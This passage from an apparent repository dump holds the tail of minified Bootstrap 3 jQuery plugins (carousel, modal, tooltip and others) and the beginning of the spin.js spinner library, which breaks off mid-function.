c="disabled",d=this.$element,e=d.is("input")?"val":"html",f=d.data();b+="Text",f.resetText||d.data("resetText",d[e]()),d[e](f[b]||this.options[b]),setTimeout(a.proxy(function(){"loadingText"==b?(this.isLoading=!0,d.addClass(c).attr(c,c)):this.isLoading&&(this.isLoading=!1,d.removeClass(c).removeAttr(c))},this),0)},b.prototype.toggle=function(){var a=!0,b=this.$element.closest('[data-toggle="buttons"]');if(b.length){var c=this.$element.find("input");"radio"==c.prop("type")&&(c.prop("checked")&&this.$element.hasClass("active")?a=!1:b.find(".active").removeClass("active")),a&&c.prop("checked",!this.$element.hasClass("active")).trigger("change")}a&&this.$element.toggleClass("active")};var c=a.fn.button;a.fn.button=function(c){return this.each(function(){var d=a(this),e=d.data("bs.button"),f="object"==typeof c&&c;e||d.data("bs.button",e=new b(this,f)),"toggle"==c?e.toggle():c&&e.setState(c)})},a.fn.button.Constructor=b,a.fn.button.noConflict=function(){return a.fn.button=c,this},a(document).on("click.bs.button.data-api","[data-toggle^=button]",function(b){var c=a(b.target);c.hasClass("btn")||(c=c.closest(".btn")),c.button("toggle"),b.preventDefault()})}(jQuery),+function(a){"use strict";var b=function(b,c){this.$element=a(b),this.$indicators=this.$element.find(".carousel-indicators"),this.options=c,this.paused=this.sliding=this.interval=this.$active=this.$items=null,"hover"==this.options.pause&&this.$element.on("mouseenter",a.proxy(this.pause,this)).on("mouseleave",a.proxy(this.cycle,this))};b.DEFAULTS={interval:5e3,pause:"hover",wrap:!0},b.prototype.cycle=function(b){return b||(this.paused=!1),this.interval&&clearInterval(this.interval),this.options.interval&&!this.paused&&(this.interval=setInterval(a.proxy(this.next,this),this.options.interval)),this},b.prototype.getActiveIndex=function(){return this.$active=this.$element.find(".item.active"),this.$items=this.$active.parent().children(),this.$items.index(this.$active)},b.prototype.to=function(b){var c=this,d=this.getActiveIndex();return b>this.$items.length-1||0>b?void 0:this.sliding?this.$element.one("slid.bs.carousel",function(){c.to(b)}):d==b?this.pause().cycle():this.slide(b>d?"next":"prev",a(this.$items[b]))},b.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".next, .prev").length&&a.support.transition&&(this.$element.trigger(a.support.transition.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},b.prototype.next=function(){return this.sliding?void 0:this.slide("next")},b.prototype.prev=function(){return this.sliding?void 0:this.slide("prev")},b.prototype.slide=function(b,c){var d=this.$element.find(".item.active"),e=c||d[b](),f=this.interval,g="next"==b?"left":"right",h="next"==b?"first":"last",i=this;if(!e.length){if(!this.options.wrap)return;e=this.$element.find(".item")[h]()}if(e.hasClass("active"))return this.sliding=!1;var j=a.Event("slide.bs.carousel",{relatedTarget:e[0],direction:g});return this.$element.trigger(j),j.isDefaultPrevented()?void 0:(this.sliding=!0,f&&this.pause(),this.$indicators.length&&(this.$indicators.find(".active").removeClass("active"),this.$element.one("slid.bs.carousel",function(){var b=a(i.$indicators.children()[i.getActiveIndex()]);b&&b.addClass("active")})),a.support.transition&&this.$element.hasClass("slide")?(e.addClass(b),e[0].offsetWidth,d.addClass(g),e.addClass(g),d.one(a.support.transition.end,function(){e.removeClass([b,g].join(" ")).addClass("active"),d.removeClass(["active",g].join(" ")),i.sliding=!1,setTimeout(function(){i.$element.trigger("slid.bs.carousel")},0)}).emulateTransitionEnd(1e3*d.css("transition-duration").slice(0,-1))):(d.removeClass("active"),e.addClass("active"),this.sliding=!1,this.$element.trigger("slid.bs.carousel")),f&&this.cycle(),this)};var c=a.fn.carousel;a.fn.carousel=function(c){return this.each(function(){var d=a(this),e=d.data("bs.carousel"),f=a.extend({},b.DEFAULTS,d.data(),"object"==typeof c&&c),g="string"==typeof c?c:f.slide;e||d.data("bs.carousel",e=new b(this,f)),"number"==typeof c?e.to(c):g?e[g]():f.interval&&e.pause().cycle()})},a.fn.carousel.Constructor=b,a.fn.carousel.noConflict=function(){return a.fn.carousel=c,this},a(document).on("click.bs.carousel.data-api","[data-slide], [data-slide-to]",function(b){var c,d=a(this),e=a(d.attr("data-target")||(c=d.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,"")),f=a.extend({},e.data(),d.data()),g=d.attr("data-slide-to");g&&(f.interval=!1),e.carousel(f),(g=d.attr("data-slide-to"))&&e.data("bs.carousel").to(g),b.preventDefault()}),a(window).on("load",function(){a('[data-ride="carousel"]').each(function(){var b=a(this);b.carousel(b.data())})})}(jQuery),+function(a){"use strict";var b=function(c,d){this.$element=a(c),this.options=a.extend({},b.DEFAULTS,d),this.transitioning=null,this.options.parent&&(this.$parent=a(this.options.parent)),this.options.toggle&&this.toggle()};b.DEFAULTS={toggle:!0},b.prototype.dimension=function(){var a=this.$element.hasClass("width");return a?"width":"height"},b.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var b=a.Event("show.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.$parent&&this.$parent.find("> .panel > .in");if(c&&c.length){var d=c.data("bs.collapse");if(d&&d.transitioning)return;c.collapse("hide"),d||c.data("bs.collapse",null)}var e=this.dimension();this.$element.removeClass("collapse").addClass("collapsing")[e](0),this.transitioning=1;var f=function(){this.$element.removeClass("collapsing").addClass("collapse in")[e]("auto"),this.transitioning=0,this.$element.trigger("shown.bs.collapse")};if(!a.support.transition)return f.call(this);var g=a.camelCase(["scroll",e].join("-"));this.$element.one(a.support.transition.end,a.proxy(f,this)).emulateTransitionEnd(350)[e](this.$element[0][g])}}},b.prototype.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeight,this.$element.addClass("collapsing").removeClass("collapse").removeClass("in"),this.transitioning=1;var d=function(){this.transitioning=0,this.$element.trigger("hidden.bs.collapse").removeClass("collapsing").addClass("collapse")};return a.support.transition?void this.$element[c](0).one(a.support.transition.end,a.proxy(d,this)).emulateTransitionEnd(350):d.call(this)}}},b.prototype.toggle=function(){this[this.$element.hasClass("in")?"hide":"show"]()};var c=a.fn.collapse;a.fn.collapse=function(c){return this.each(function(){var d=a(this),e=d.data("bs.collapse"),f=a.extend({},b.DEFAULTS,d.data(),"object"==typeof c&&c);!e&&f.toggle&&"show"==c&&(c=!c),e||d.data("bs.collapse",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.collapse.Constructor=b,a.fn.collapse.noConflict=function(){return a.fn.collapse=c,this},a(document).on("click.bs.collapse.data-api","[data-toggle=collapse]",function(b){var c,d=a(this),e=d.attr("data-target")||b.preventDefault()||(c=d.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,""),f=a(e),g=f.data("bs.collapse"),h=g?"toggle":d.data(),i=d.attr("data-parent"),j=i&&a(i);g&&g.transitioning||(j&&j.find('[data-toggle=collapse][data-parent="'+i+'"]').not(d).addClass("collapsed"),d[f.hasClass("in")?"addClass":"removeClass"]("collapsed")),f.collapse(h)})}(jQuery),+function(a){"use strict";function b(b){a(d).remove(),a(e).each(function(){var d=c(a(this)),e={relatedTarget:this};d.hasClass("open")&&(d.trigger(b=a.Event("hide.bs.dropdown",e)),b.isDefaultPrevented()||d.removeClass("open").trigger("hidden.bs.dropdown",e))})}function c(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#[A-Za-z]/.test(c)&&c.replace(/.*(?=#[^\s]*$)/,""));var d=c&&a(c);return d&&d.length?d:b.parent()}var d=".dropdown-backdrop",e="[data-toggle=dropdown]",f=function(b){a(b).on("click.bs.dropdown",this.toggle)};f.prototype.toggle=function(d){var e=a(this);if(!e.is(".disabled, :disabled")){var f=c(e),g=f.hasClass("open");if(b(),!g){"ontouchstart"in document.documentElement&&!f.closest(".navbar-nav").length&&a('<div class="dropdown-backdrop"/>').insertAfter(a(this)).on("click",b);var h={relatedTarget:this};if(f.trigger(d=a.Event("show.bs.dropdown",h)),d.isDefaultPrevented())return;f.toggleClass("open").trigger("shown.bs.dropdown",h),e.focus()}return!1}},f.prototype.keydown=function(b){if(/(38|40|27)/.test(b.keyCode)){var d=a(this);if(b.preventDefault(),b.stopPropagation(),!d.is(".disabled, :disabled")){var f=c(d),g=f.hasClass("open");if(!g||g&&27==b.keyCode)return 27==b.which&&f.find(e).focus(),d.click();var h=" li:not(.divider):visible a",i=f.find("[role=menu]"+h+", [role=listbox]"+h);if(i.length){var j=i.index(i.filter(":focus"));38==b.keyCode&&j>0&&j--,40==b.keyCode&&j<i.length-1&&j++,~j||(j=0),i.eq(j).focus()}}}};var g=a.fn.dropdown;a.fn.dropdown=function(b){return this.each(function(){var c=a(this),d=c.data("bs.dropdown");d||c.data("bs.dropdown",d=new f(this)),"string"==typeof b&&d[b].call(c)})},a.fn.dropdown.Constructor=f,a.fn.dropdown.noConflict=function(){return a.fn.dropdown=g,this},a(document).on("click.bs.dropdown.data-api",b).on("click.bs.dropdown.data-api",".dropdown form",function(a){a.stopPropagation()}).on("click.bs.dropdown.data-api",e,f.prototype.toggle).on("keydown.bs.dropdown.data-api",e+", [role=menu], [role=listbox]",f.prototype.keydown)}(jQuery),+function(a){"use strict";var b=function(b,c){this.options=c,this.$element=a(b),this.$backdrop=this.isShown=null,this.options.remote&&this.$element.find(".modal-content").load(this.options.remote,a.proxy(function(){this.$element.trigger("loaded.bs.modal")},this))};b.DEFAULTS={backdrop:!0,keyboard:!0,show:!0},b.prototype.toggle=function(a){return this[this.isShown?"hide":"show"](a)},b.prototype.show=function(b){var c=this,d=a.Event("show.bs.modal",{relatedTarget:b});this.$element.trigger(d),this.isShown||d.isDefaultPrevented()||(this.isShown=!0,this.escape(),this.$element.on("click.dismiss.bs.modal",'[data-dismiss="modal"]',a.proxy(this.hide,this)),this.backdrop(function(){var d=a.support.transition&&c.$element.hasClass("fade");c.$element.parent().length||c.$element.appendTo(document.body),c.$element.show().scrollTop(0),d&&c.$element[0].offsetWidth,c.$element.addClass("in").attr("aria-hidden",!1),c.enforceFocus();var e=a.Event("shown.bs.modal",{relatedTarget:b});d?c.$element.find(".modal-dialog").one(a.support.transition.end,function(){c.$element.focus().trigger(e)}).emulateTransitionEnd(300):c.$element.focus().trigger(e)}))},b.prototype.hide=function(b){b&&b.preventDefault(),b=a.Event("hide.bs.modal"),this.$element.trigger(b),this.isShown&&!b.isDefaultPrevented()&&(this.isShown=!1,this.escape(),a(document).off("focusin.bs.modal"),this.$element.removeClass("in").attr("aria-hidden",!0).off("click.dismiss.bs.modal"),a.support.transition&&this.$element.hasClass("fade")?this.$element.one(a.support.transition.end,a.proxy(this.hideModal,this)).emulateTransitionEnd(300):this.hideModal())},b.prototype.enforceFocus=function(){a(document).off("focusin.bs.modal").on("focusin.bs.modal",a.proxy(function(a){this.$element[0]===a.target||this.$element.has(a.target).length||this.$element.focus()},this))},b.prototype.escape=function(){this.isShown&&this.options.keyboard?this.$element.on("keyup.dismiss.bs.modal",a.proxy(function(a){27==a.which&&this.hide()},this)):this.isShown||this.$element.off("keyup.dismiss.bs.modal")},b.prototype.hideModal=function(){var a=this;this.$element.hide(),this.backdrop(function(){a.removeBackdrop(),a.$element.trigger("hidden.bs.modal")})},b.prototype.removeBackdrop=function(){this.$backdrop&&this.$backdrop.remove(),this.$backdrop=null},b.prototype.backdrop=function(b){var c=this.$element.hasClass("fade")?"fade":"";if(this.isShown&&this.options.backdrop){var d=a.support.transition&&c;if(this.$backdrop=a('<div class="modal-backdrop '+c+'" />').appendTo(document.body),this.$element.on("click.dismiss.bs.modal",a.proxy(function(a){a.target===a.currentTarget&&("static"==this.options.backdrop?this.$element[0].focus.call(this.$element[0]):this.hide.call(this))},this)),d&&this.$backdrop[0].offsetWidth,this.$backdrop.addClass("in"),!b)return;d?this.$backdrop.one(a.support.transition.end,b).emulateTransitionEnd(150):b()}else!this.isShown&&this.$backdrop?(this.$backdrop.removeClass("in"),a.support.transition&&this.$element.hasClass("fade")?this.$backdrop.one(a.support.transition.end,b).emulateTransitionEnd(150):b()):b&&b()};var c=a.fn.modal;a.fn.modal=function(c,d){return this.each(function(){var e=a(this),f=e.data("bs.modal"),g=a.extend({},b.DEFAULTS,e.data(),"object"==typeof c&&c);f||e.data("bs.modal",f=new b(this,g)),"string"==typeof c?f[c](d):g.show&&f.show(d)})},a.fn.modal.Constructor=b,a.fn.modal.noConflict=function(){return a.fn.modal=c,this},a(document).on("click.bs.modal.data-api",'[data-toggle="modal"]',function(b){var c=a(this),d=c.attr("href"),e=a(c.attr("data-target")||d&&d.replace(/.*(?=#[^\s]+$)/,"")),f=e.data("bs.modal")?"toggle":a.extend({remote:!/#/.test(d)&&d},e.data(),c.data());c.is("a")&&b.preventDefault(),e.modal(f,this).one("hide",function(){c.is(":visible")&&c.focus()})}),a(document).on("show.bs.modal",".modal",function(){a(document.body).addClass("modal-open")}).on("hidden.bs.modal",".modal",function(){a(document.body).removeClass("modal-open")})}(jQuery),+function(a){"use strict";var b=function(a,b){this.type=this.options=this.enabled=this.timeout=this.hoverState=this.$element=null,this.init("tooltip",a,b)};b.DEFAULTS={animation:!0,placement:"top",selector:!1,template:'<div class="tooltip"><div class="tooltip-arrow"></div><div class="tooltip-inner"></div></div>',trigger:"hover focus",title:"",delay:0,html:!1,container:!1},b.prototype.init=function(b,c,d){this.enabled=!0,this.type=b,this.$element=a(c),this.options=this.getOptions(d);for(var e=this.options.trigger.split(" "),f=e.length;f--;){var g=e[f];if("click"==g)this.$element.on("click."+this.type,this.options.selector,a.proxy(this.toggle,this));else if("manual"!=g){var h="hover"==g?"mouseenter":"focusin",i="hover"==g?"mouseleave":"focusout";this.$element.on(h+"."+this.type,this.options.selector,a.proxy(this.enter,this)),this.$element.on(i+"."+this.type,this.options.selector,a.proxy(this.leave,this))}}this.options.selector?this._options=a.extend({},this.options,{trigger:"manual",selector:""}):this.fixTitle()},b.prototype.getDefaults=function(){return b.DEFAULTS},b.prototype.getOptions=function(b){return b=a.extend({},this.getDefaults(),this.$element.data(),b),b.delay&&"number"==typeof b.delay&&(b.delay={show:b.delay,hide:b.delay}),b},b.prototype.getDelegateOptions=function(){var b={},c=this.getDefaults();return this._options&&a.each(this._options,function(a,d){c[a]!=d&&(b[a]=d)}),b},b.prototype.enter=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget)[this.type](this.getDelegateOptions()).data("bs."+this.type);return clearTimeout(c.timeout),c.hoverState="in",c.options.delay&&c.options.delay.show?void(c.timeout=setTimeout(function(){"in"==c.hoverState&&c.show()},c.options.delay.show)):c.show()},b.prototype.leave=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget)[this.type](this.getDelegateOptions()).data("bs."+this.type);return clearTimeout(c.timeout),c.hoverState="out",c.options.delay&&c.options.delay.hide?void(c.timeout=setTimeout(function(){"out"==c.hoverState&&c.hide()},c.options.delay.hide)):c.hide()},b.prototype.show=function(){var b=a.Event("show.bs."+this.type);if(this.hasContent()&&this.enabled){if(this.$element.trigger(b),b.isDefaultPrevented())return;var c=this,d=this.tip();this.setContent(),this.options.animation&&d.addClass("fade");var e="function"==typeof this.options.placement?this.options.placement.call(this,d[0],this.$element[0]):this.options.placement,f=/\s?auto?\s?/i,g=f.test(e);g&&(e=e.replace(f,"")||"top"),d.detach().css({top:0,left:0,display:"block"}).addClass(e),this.options.container?d.appendTo(this.options.container):d.insertAfter(this.$element);var h=this.getPosition(),i=d[0].offsetWidth,j=d[0].offsetHeight;if(g){var k=this.$element.parent(),l=e,m=document.documentElement.scrollTop||document.body.scrollTop,n="body"==this.options.container?window.innerWidth:k.outerWidth(),o="body"==this.options.container?window.innerHeight:k.outerHeight(),p="body"==this.options.container?0:k.offset().left;e="bottom"==e&&h.top+h.height+j-m>o?"top":"top"==e&&h.top-m-j<0?"bottom":"right"==e&&h.right+i>n?"left":"left"==e&&h.left-i<p?"right":e,d.removeClass(l).addClass(e)}var q=this.getCalculatedOffset(e,h,i,j);this.applyPlacement(q,e),this.hoverState=null;var r=function(){c.$element.trigger("shown.bs."+c.type)};a.support.transition&&this.$tip.hasClass("fade")?d.one(a.support.transition.end,r).emulateTransitionEnd(150):r()}},b.prototype.applyPlacement=function(b,c){var d,e=this.tip(),f=e[0].offsetWidth,g=e[0].offsetHeight,h=parseInt(e.css("margin-top"),10),i=parseInt(e.css("margin-left"),10);isNaN(h)&&(h=0),isNaN(i)&&(i=0),b.top=b.top+h,b.left=b.left+i,a.offset.setOffset(e[0],a.extend({using:function(a){e.css({top:Math.round(a.top),left:Math.round(a.left)})}},b),0),e.addClass("in");var j=e[0].offsetWidth,k=e[0].offsetHeight;if("top"==c&&k!=g&&(d=!0,b.top=b.top+g-k),/bottom|top/.test(c)){var l=0;b.left<0&&(l=-2*b.left,b.left=0,e.offset(b),j=e[0].offsetWidth,k=e[0].offsetHeight),this.replaceArrow(l-f+j,j,"left")}else this.replaceArrow(k-g,k,"top");d&&e.offset(b)},b.prototype.replaceArrow=function(a,b,c){this.arrow().css(c,a?50*(1-a/b)+"%":"")},b.prototype.setContent=function(){var a=this.tip(),b=this.getTitle();a.find(".tooltip-inner")[this.options.html?"html":"text"](b),a.removeClass("fade in top bottom left right")},b.prototype.hide=function(){function b(){"in"!=c.hoverState&&d.detach(),c.$element.trigger("hidden.bs."+c.type)}var c=this,d=this.tip(),e=a.Event("hide.bs."+this.type);return this.$element.trigger(e),e.isDefaultPrevented()?void 0:(d.removeClass("in"),a.support.transition&&this.$tip.hasClass("fade")?d.one(a.support.transition.end,b).emulateTransitionEnd(150):b(),this.hoverState=null,this)},b.prototype.fixTitle=function(){var a=this.$element;(a.attr("title")||"string"!=typeof a.attr("data-original-title"))&&a.attr("data-original-title",a.attr("title")||"").attr("title","")},b.prototype.hasContent=function(){return this.getTitle()},b.prototype.getPosition=function(){var b=this.$element[0];return a.extend({},"function"==typeof b.getBoundingClientRect?b.getBoundingClientRect():{width:b.offsetWidth,height:b.offsetHeight},this.$element.offset())},b.prototype.getCalculatedOffset=function(a,b,c,d){return"bottom"==a?{top:b.top+b.height,left:b.left+b.width/2-c/2}:"top"==a?{top:b.top-d,left:b.left+b.width/2-c/2}:"left"==a?{top:b.top+b.height/2-d/2,left:b.left-c}:{top:b.top+b.height/2-d/2,left:b.left+b.width}},b.prototype.getTitle=function(){var a,b=this.$element,c=this.options;return a=b.attr("data-original-title")||("function"==typeof c.title?c.title.call(b[0]):c.title)},b.prototype.tip=function(){return this.$tip=this.$tip||a(this.options.template)},b.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".tooltip-arrow")},b.prototype.validate=function(){this.$element[0].parentNode||(this.hide(),this.$element=null,this.options=null)},b.prototype.enable=function(){this.enabled=!0},b.prototype.disable=function(){this.enabled=!1},b.prototype.toggleEnabled=function(){this.enabled=!this.enabled},b.prototype.toggle=function(b){var c=b?a(b.currentTarget)[this.type](this.getDelegateOptions()).data("bs."+this.type):this;c.tip().hasClass("in")?c.leave(c):c.enter(c)},b.prototype.destroy=function(){clearTimeout(this.timeout),this.hide().$element.off("."+this.type).removeData("bs."+this.type)};var c=a.fn.tooltip;a.fn.tooltip=function(c){return this.each(function(){var d=a(this),e=d.data("bs.tooltip"),f="object"==typeof c&&c;(e||"destroy"!=c)&&(e||d.data("bs.tooltip",e=new b(this,f)),"string"==typeof c&&e[c]())})},a.fn.tooltip.Constructor=b,a.fn.tooltip.noConflict=function(){return a.fn.tooltip=c,this}}(jQuery),+function(a){"use strict";var b=function(a,b){this.init("popover",a,b)};if(!a.fn.tooltip)throw new Error("Popover requires tooltip.js");b.DEFAULTS=a.extend({},a.fn.tooltip.Constructor.DEFAULTS,{placement:"right",trigger:"click",content:"",template:'<div class="popover"><div class="arrow"></div><h3 class="popover-title"></h3><div class="popover-content"></div></div>'}),b.prototype=a.extend({},a.fn.tooltip.Constructor.prototype),b.prototype.constructor=b,b.prototype.getDefaults=function(){return b.DEFAULTS},b.prototype.setContent=function(){var a=this.tip(),b=this.getTitle(),c=this.getContent();a.find(".popover-title")[this.options.html?"html":"text"](b),a.find(".popover-content")[this.options.html?"string"==typeof c?"html":"append":"text"](c),a.removeClass("fade top bottom left right in"),a.find(".popover-title").html()||a.find(".popover-title").hide()},b.prototype.hasContent=function(){return this.getTitle()||this.getContent()},b.prototype.getContent=function(){var a=this.$element,b=this.options;return a.attr("data-content")||("function"==typeof b.content?b.content.call(a[0]):b.content)},b.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".arrow")},b.prototype.tip=function(){return this.$tip||(this.$tip=a(this.options.template)),this.$tip};var c=a.fn.popover;a.fn.popover=function(c){return this.each(function(){var d=a(this),e=d.data("bs.popover"),f="object"==typeof c&&c;(e||"destroy"!=c)&&(e||d.data("bs.popover",e=new b(this,f)),"string"==typeof c&&e[c]())})},a.fn.popover.Constructor=b,a.fn.popover.noConflict=function(){return a.fn.popover=c,this}}(jQuery),+function(a){"use strict";function b(c,d){var e,f=a.proxy(this.process,this);this.$element=a(a(c).is("body")?window:c),this.$body=a("body"),this.$scrollElement=this.$element.on("scroll.bs.scroll-spy.data-api",f),this.options=a.extend({},b.DEFAULTS,d),this.selector=(this.options.target||(e=a(c).attr("href"))&&e.replace(/.*(?=#[^\s]+$)/,"")||"")+" .nav li > a",this.offsets=a([]),this.targets=a([]),this.activeTarget=null,this.refresh(),this.process()}b.DEFAULTS={offset:10},b.prototype.refresh=function(){var b=this.$element[0]==window?"offset":"position";this.offsets=a([]),this.targets=a([]);{var c=this;this.$body.find(this.selector).map(function(){var d=a(this),e=d.data("target")||d.attr("href"),f=/^#./.test(e)&&a(e);return f&&f.length&&f.is(":visible")&&[[f[b]().top+(!a.isWindow(c.$scrollElement.get(0))&&c.$scrollElement.scrollTop()),e]]||null}).sort(function(a,b){return a[0]-b[0]}).each(function(){c.offsets.push(this[0]),c.targets.push(this[1])})}},b.prototype.process=function(){var a,b=this.$scrollElement.scrollTop()+this.options.offset,c=this.$scrollElement[0].scrollHeight||this.$body[0].scrollHeight,d=c-this.$scrollElement.height(),e=this.offsets,f=this.targets,g=this.activeTarget;if(b>=d)return g!=(a=f.last()[0])&&this.activate(a);if(g&&b<=e[0])return g!=(a=f[0])&&this.activate(a);for(a=e.length;a--;)g!=f[a]&&b>=e[a]&&(!e[a+1]||b<=e[a+1])&&this.activate(f[a])},b.prototype.activate=function(b){this.activeTarget=b,a(this.selector).parentsUntil(this.options.target,".active").removeClass("active");var c=this.selector+'[data-target="'+b+'"],'+this.selector+'[href="'+b+'"]',d=a(c).parents("li").addClass("active");d.parent(".dropdown-menu").length&&(d=d.closest("li.dropdown").addClass("active")),d.trigger("activate.bs.scrollspy")};var c=a.fn.scrollspy;a.fn.scrollspy=function(c){return this.each(function(){var d=a(this),e=d.data("bs.scrollspy"),f="object"==typeof c&&c;e||d.data("bs.scrollspy",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.scrollspy.Constructor=b,a.fn.scrollspy.noConflict=function(){return a.fn.scrollspy=c,this},a(window).on("load",function(){a('[data-spy="scroll"]').each(function(){var b=a(this);b.scrollspy(b.data())})})}(jQuery),+function(a){"use strict";var b=function(b){this.element=a(b)};b.prototype.show=function(){var b=this.element,c=b.closest("ul:not(.dropdown-menu)"),d=b.data("target");if(d||(d=b.attr("href"),d=d&&d.replace(/.*(?=#[^\s]*$)/,"")),!b.parent("li").hasClass("active")){var e=c.find(".active:last a")[0],f=a.Event("show.bs.tab",{relatedTarget:e});if(b.trigger(f),!f.isDefaultPrevented()){var g=a(d);this.activate(b.parent("li"),c),this.activate(g,g.parent(),function(){b.trigger({type:"shown.bs.tab",relatedTarget:e})})}}},b.prototype.activate=function(b,c,d){function e(){f.removeClass("active").find("> .dropdown-menu > .active").removeClass("active"),b.addClass("active"),g?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu")&&b.closest("li.dropdown").addClass("active"),d&&d()}var f=c.find("> .active"),g=d&&a.support.transition&&f.hasClass("fade");g?f.one(a.support.transition.end,e).emulateTransitionEnd(150):e(),f.removeClass("in")};var c=a.fn.tab;a.fn.tab=function(c){return this.each(function(){var d=a(this),e=d.data("bs.tab");e||d.data("bs.tab",e=new b(this)),"string"==typeof c&&e[c]()})},a.fn.tab.Constructor=b,a.fn.tab.noConflict=function(){return a.fn.tab=c,this},a(document).on("click.bs.tab.data-api",'[data-toggle="tab"], [data-toggle="pill"]',function(b){b.preventDefault(),a(this).tab("show")})}(jQuery),+function(a){"use strict";var b=function(c,d){this.options=a.extend({},b.DEFAULTS,d),this.$window=a(window).on("scroll.bs.affix.data-api",a.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",a.proxy(this.checkPositionWithEventLoop,this)),this.$element=a(c),this.affixed=this.unpin=this.pinnedOffset=null,this.checkPosition()};b.RESET="affix affix-top affix-bottom",b.DEFAULTS={offset:0},b.prototype.getPinnedOffset=function(){if(this.pinnedOffset)return this.pinnedOffset;this.$element.removeClass(b.RESET).addClass("affix");var a=this.$window.scrollTop(),c=this.$element.offset();return this.pinnedOffset=c.top-a},b.prototype.checkPositionWithEventLoop=function(){setTimeout(a.proxy(this.checkPosition,this),1)},b.prototype.checkPosition=function(){if(this.$element.is(":visible")){var c=a(document).height(),d=this.$window.scrollTop(),e=this.$element.offset(),f=this.options.offset,g=f.top,h=f.bottom;"top"==this.affixed&&(e.top+=d),"object"!=typeof f&&(h=g=f),"function"==typeof g&&(g=f.top(this.$element)),"function"==typeof h&&(h=f.bottom(this.$element));var i=null!=this.unpin&&d+this.unpin<=e.top?!1:null!=h&&e.top+this.$element.height()>=c-h?"bottom":null!=g&&g>=d?"top":!1;if(this.affixed!==i){this.unpin&&this.$element.css("top","");var j="affix"+(i?"-"+i:""),k=a.Event(j+".bs.affix");this.$element.trigger(k),k.isDefaultPrevented()||(this.affixed=i,this.unpin="bottom"==i?this.getPinnedOffset():null,this.$element.removeClass(b.RESET).addClass(j).trigger(a.Event(j.replace("affix","affixed"))),"bottom"==i&&this.$element.offset({top:c-h-this.$element.height()}))}}};var c=a.fn.affix;a.fn.affix=function(c){return this.each(function(){var d=a(this),e=d.data("bs.affix"),f="object"==typeof c&&c;e||d.data("bs.affix",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.affix.Constructor=b,a.fn.affix.noConflict=function(){return a.fn.affix=c,this},a(window).on("load",function(){a('[data-spy="affix"]').each(function(){var b=a(this),c=b.data();c.offset=c.offset||{},c.offsetBottom&&(c.offset.bottom=c.offsetBottom),c.offsetTop&&(c.offset.top=c.offsetTop),b.affix(c)})})}(jQuery);
2 | 


--------------------------------------------------------------------------------
/app/js/assets/spin.min.js:
--------------------------------------------------------------------------------
1 | // http://spin.js.org/#v2.3.2
2 | !function(a,b){"object"==typeof module&&module.exports?module.exports=b():"function"==typeof define&&define.amd?define(b):a.Spinner=b()}(this,function(){"use strict";function a(a,b){var c,d=document.createElement(a||"div");for(c in b)d[c]=b[c];return d}function b(a){for(var b=1,c=arguments.length;c>b;b++)a.appendChild(arguments[b]);return a}function c(a,b,c,d){var e=["opacity",b,~~(100*a),c,d].join("-"),f=.01+c/d*100,g=Math.max(1-(1-a)/b*(100-f),a),h=j.substring(0,j.indexOf("Animation")).toLowerCase(),i=h&&"-"+h+"-"||"";return m[e]||(k.insertRule("@"+i+"keyframes "+e+"{0%{opacity:"+g+"}"+f+"%{opacity:"+a+"}"+(f+.01)+"%{opacity:1}"+(f+b)%100+"%{opacity:"+a+"}100%{opacity:"+g+"}}",k.cssRules.length),m[e]=1),e}function d(a,b){var c,d,e=a.style;if(b=b.charAt(0).toUpperCase()+b.slice(1),void 0!==e[b])return b;for(d=0;d<l.length;d++)if(c=l[d]+b,void 0!==e[c])return c}function e(a,b){for(var c in b)a.style[d(a,c)||c]=b[c];return a}function f(a){for(var b=1;b<arguments.length;b++){var c=arguments[b];for(var d in c)void 0===a[d]&&(a[d]=c[d])}return a}function g(a,b){return"string"==typeof a?a:a[b%a.length]}function h(a){this.opts=f(a||{},h.defaults,n)}function i(){function c(b,c){return a("<"+b+' xmlns="urn:schemas-microsoft.com:vml" class="spin-vml">',c)}k.addRule(".spin-vml","behavior:url(#default#VML)"),h.prototype.lines=function(a,d){function f(){return e(c("group",{coordsize:k+" "+k,coordorigin:-j+" "+-j}),{width:k,height:k})}function h(a,h,i){b(m,b(e(f(),{rotation:360/d.lines*a+"deg",left:~~h}),b(e(c("roundrect",{arcsize:d.corners}),{width:j,height:d.scale*d.width,left:d.scale*d.radius,top:-d.scale*d.width>>1,filter:i}),c("fill",{color:g(d.color,a),opacity:d.opacity}),c("stroke",{opacity:0}))))}var i,j=d.scale*(d.length+d.width),k=2*d.scale*j,l=-(d.width+d.length)*d.scale*2+"px",m=e(f(),{position:"absolute",top:l,left:l});if(d.shadow)for(i=1;i<=d.lines;i++)h(i,-2,"progid:DXImageTransform.Microsoft.Blur(pixelradius=2,makeshadow=1,shadowopacity=.3)");for(i=1;i<=d.lines;i++)h(i);return b(a,m)},h.prototype.opacity=function(a,b,c,d){var e=a.firstChild;d=d.shadow&&d.lines||0,e&&b+d<e.childNodes.length&&(e=e.childNodes[b+d],e=e&&e.firstChild,e=e&&e.firstChild,e&&(e.opacity=c))}}var j,k,l=["webkit","Moz","ms","O"],m={},n={lines:12,length:7,width:5,radius:10,scale:1,corners:1,color:"#000",opacity:.25,rotate:0,direction:1,speed:1,trail:100,fps:20,zIndex:2e9,className:"spinner",top:"50%",left:"50%",shadow:!1,hwaccel:!1,position:"absolute"};if(h.defaults={},f(h.prototype,{spin:function(b){this.stop();var 